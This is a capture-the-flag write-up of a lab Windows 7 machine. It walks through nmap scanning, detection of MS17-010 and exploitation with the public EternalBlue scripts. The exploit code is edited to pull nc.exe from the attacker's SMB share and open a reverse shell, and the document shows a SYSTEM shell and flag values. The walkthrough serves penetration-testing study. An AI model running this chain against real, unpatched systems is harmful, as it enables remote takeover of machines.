As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
-sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.
-p- scanning the entire port range, from 1 to 65535.
-T5insane mode, it is the fastest mode of the nmap time template.
-Pn assume the host is online.
-n scan without reverse DNS resolution.
-oNsave the scan result into a file, in this case the allports file.
# Nmap 7.92 scan initiated Thu Mar 24 22:03:58 2022 as: nmap -sS -p- -T5 --min-rate 5000 -n -Pn -oN allPorts 10.10.10.40
Warning: 10.10.10.40 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.40
Host is up (0.14s latency).
Not shown: 61407 closed tcp ports (reset), 4119 filtered tcp ports (no-response)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown
# Nmap done at Thu Mar 24 22:04:28 2022 -- 1 IP address (1 host up) scanned in 30.58 seconds
Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:
-sC performs the scan using the default set of scripts.
-sV enables version detection.
-oNsave the scan result into file, in this case the targeted file.
# Nmap 7.92 scan initiated Thu Mar 24 22:05:28 2022 as: nmap -sCV -p135,139,445,49152,49153,49154,49155,49156,49157 -oN targeted 10.10.10.40
Nmap scan report for 10.10.10.40
Host is up (0.076s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2022-03-24T21:17:43
|_ start_date: 2022-03-24T21:13:36
| smb2-security-mode:
| 2.1:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: haris-PC
| NetBIOS computer name: HARIS-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2022-03-24T21:17:44+00:00
|_clock-skew: mean: 11m11s, deviation: 1s, median: 11m10s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Mar 24 22:06:41 2022 -- 1 IP address (1 host up) scanned in 73.06 seconds
The machine has the Windows 7 Professional operative system, and the SMB service open, and it allows guest authentication. Let's try to enumerate the SMB service a bit more with nmap by applying a series of scripts from the vuln and safe categories.
nmap --script "vuln and safe" -p445 -oN smbScan 10.10.10.40
--script Runs a script scan script categories.
-p scan the specific port.
-oNsave the scan result into file, in this case the smbScan file.
# Nmap 7.92 scan initiated Thu Mar 24 22:22:24 2022 as: nmap --script "vuln and safe" -p445 -oN smbScan 10.10.10.40
Nmap scan report for 10.10.10.40
Host is up (0.054s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
# Nmap done at Thu Mar 24 22:22:28 2022 -- 1 IP address (1 host up) scanned in 4.01 seconds
It looks like the machine is vulnerable to the EternalBlue (MS17-010) exploit.
EternalBlue allows remote attackers to execute arbitrary code on a target system by sending specially crafted messages to the SMBv1 server.
Exploitation
git clone https://github.com/worawit/MS17-010
First, we'll have to check it the machine is really vulnerable to the EternalBlue exploit. First edit the checker.py file and add the guest username.
nano MS17-010/checker.py
USERNAME = 'guest'
PASSWORD = ''
Now execute it with Python2.
python2 MS17-010/checker.py 10.10.10.40
Target OS: Windows 7 Professional 7601 Service Pack 1
The target is not patched
=== Testing named pipes ===
spoolss: STATUS_OBJECT_NAME_NOT_FOUND
samr: Ok (64 bit)
netlogon: Ok (Bind context 1 rejected: provider_rejection; abstract_syntax_not_supported (this usually means the interface isn't listening on the given endpoint))
lsarpc: Ok (64 bit)
browser: Ok (64 bit)
The machine is vulnerable to the EternalBlue exploit through various pipe names. Now let's edit the zzz_exploit.py script and add the guest username again.
nano MS17-010/zzz_exploit.py
USERNAME = 'guest'
PASSWORD = ''
Now let's find for the cmd word, and change the smb_pwn function, so it will send us a reverse shell.
def smb_pwn(conn, arch):
smbConn = conn.get_smbconnection()
# print('creating file c:\\pwned.txt on the target')
# tid2 = smbConn.connectTree('C$')
# fid2 = smbConn.createFile(tid2, '/pwned.txt')
# smbConn.closeFile(tid2, fid2)
# smbConn.disconnectTree(tid2)
#smb_send_file(smbConn, sys.argv[0], 'C', '/exploit.py')
service_exec(conn, r'cmd /c \\10.10.14.19\smbFolder\nc.exe -e cmd 10.10.14.19 4444')
# Note: there are many methods to get shell over SMB admin session
# a simple method to get shell (but easily to be detected by AV) is
# executing binary generated by "msfvenom -f exe-service ..."
The command will grab the nc.exe from a shared folder to send us the reverse shell. So let's set an SMB server with impacket on the folder in which we have the nc.exe binary.
Before executing the script, let's set a netcat listener on port 4444.
rlwrap nc -lvnp 4444
-llisten mode.
-vverbose mode.
-nnumeric-only IP, no DNS resolution.
-p specify the port to listen on.
Finally, if we execute the zzz_exploit.py script indicating the IP address and the samr pipe name, it will grab the nc.exe binary from our shared folder to send us a reverse shell, and then all we have to do is reap the harvest and take both the user and the root flag.
python2 MS17-010/zzz_exploit.py 10.10.10.40 samr
listening on [any] 4444 ...
connect to [10.10.14.19] from (UNKNOWN) [10.10.10.40] 49163
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
whoami
nt authority\system
type \users\haris\desktop\user.txt
a221bdab893a8249c8675bbf895d78de
type \users\administrator\desktop\root.txt
c5046883c3b47ea2a7f62919ca45e59d
Let's clone the following , which will allow us to exploit the EternalBlue exploit.
